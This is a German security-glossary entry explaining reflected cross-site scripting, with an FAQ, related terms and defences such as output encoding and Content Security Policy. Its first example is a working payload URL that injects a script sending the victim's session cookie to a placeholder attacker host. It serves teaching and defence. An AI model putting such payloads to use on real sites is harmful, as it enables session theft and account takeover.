Reflected XSS
Was ist Reflected XSS?
Reflected XSSNicht-persistente XSS-Variante, bei der angreifergesteuerte Eingaben unmittelbar in der Antwort gespiegelt und im Browser des Opfers ausgeführt werden.
Reflected XSS (auch nicht-persistent oder Typ-1) tritt auf, wenn eine Webanwendung Daten aus einer HTTP-Anfrage — meist Query-Parameter oder Formularfelder — ohne saubere Ausgabecodierung in die Antwort zurückschreibt. Da das Opfer einen präparierten Link anklicken muss, erfolgt die Auslieferung typischerweise über Phishing, Malvertising oder Messenger. Erfolgreiche Ausnutzung erlaubt das Stehlen von Session-Cookies, das Ausführen von Aktionen im Namen des Nutzers oder die Eskalation zur vollständigen Kontoübernahme. Schutz bieten kontextabhängiges HTML-Encoding, eine strikte Content Security Policy und Frameworks mit automatischer Template-Escaping.
● Beispiele
- 01
https://example.com/search?q=<script>document.location='https://evil/?c='+document.cookie</script>
- 02
Fehlerseite, die einen ungefilterten 'message'-Parameter direkt ins DOM einfügt.
● Häufige Fragen
Was ist Reflected XSS?
Nicht-persistente XSS-Variante, bei der angreifergesteuerte Eingaben unmittelbar in der Antwort gespiegelt und im Browser des Opfers ausgeführt werden. Es gehört zur Kategorie Angriffe und Bedrohungen der Cybersicherheit.
Was bedeutet Reflected XSS?
Nicht-persistente XSS-Variante, bei der angreifergesteuerte Eingaben unmittelbar in der Antwort gespiegelt und im Browser des Opfers ausgeführt werden.
Wie funktioniert Reflected XSS?
Reflected XSS (auch nicht-persistent oder Typ-1) tritt auf, wenn eine Webanwendung Daten aus einer HTTP-Anfrage — meist Query-Parameter oder Formularfelder — ohne saubere Ausgabecodierung in die Antwort zurückschreibt. Da das Opfer einen präparierten Link anklicken muss, erfolgt die Auslieferung typischerweise über Phishing, Malvertising oder Messenger. Erfolgreiche Ausnutzung erlaubt das Stehlen von Session-Cookies, das Ausführen von Aktionen im Namen des Nutzers oder die Eskalation zur vollständigen Kontoübernahme. Schutz bieten kontextabhängiges HTML-Encoding, eine strikte Content Security Policy und Frameworks mit automatischer Template-Escaping.
Wie schützt man sich gegen Reflected XSS?
Schutzmaßnahmen gegen Reflected XSS kombinieren typischerweise technische Kontrollen und operative Praktiken, wie in der Definition oben beschrieben.
Welche anderen Bezeichnungen gibt es für Reflected XSS?
Übliche alternative Bezeichnungen: Nicht-persistentes XSS, Typ-1-XSS.
● Verwandte Begriffe
- attacks№ 240
Cross-Site-Scripting (XSS)
Web-Schwachstelle, mit der Angreifer bösartige Skripte in Seiten injizieren, die andere Nutzer öffnen, sodass der Code im Browser des Opfers unter der Origin der Seite ausgeführt wird.
- attacks№ 1107
Stored XSS
Persistente Cross-Site-Scripting-Schwachstelle: vom Angreifer eingeschleuster Code wird serverseitig gespeichert und im Browser jedes Besuchers ausgeführt.
- attacks№ 347
DOM-basierter XSS
XSS-Variante, bei der Injektion und Ausführung vollständig im Browser stattfinden, weil clientseitiges JavaScript ungeprüfte Daten in einen Sink schreibt.
- appsec№ 214
Content Security Policy (CSP)
HTTP-Antwort-Header, der dem Browser mitteilt, welche Quellen für Skripte, Styles, Frames und andere Inhalte erlaubt sind, und so XSS- und Datendiebstahlangriffe begrenzt.
- attacks№ 821
Phishing
Ein Social-Engineering-Angriff, bei dem sich der Angreifer als vertrauenswürdige Stelle ausgibt, um Opfer zur Preisgabe von Zugangsdaten, Geldüberweisungen oder zur Ausführung von Schadsoftware zu verleiten.
- appsec№ 773
Ausgabeencodierung
Umwandlung unvertrauenswürdiger Daten in eine für einen bestimmten Ausgabekontext (HTML, JavaScript, URL, SQL, Shell) sichere Form, sodass sie nicht ausbrechen und als Code ausgeführt werden.
● Siehe auch
- № 104Blind XSS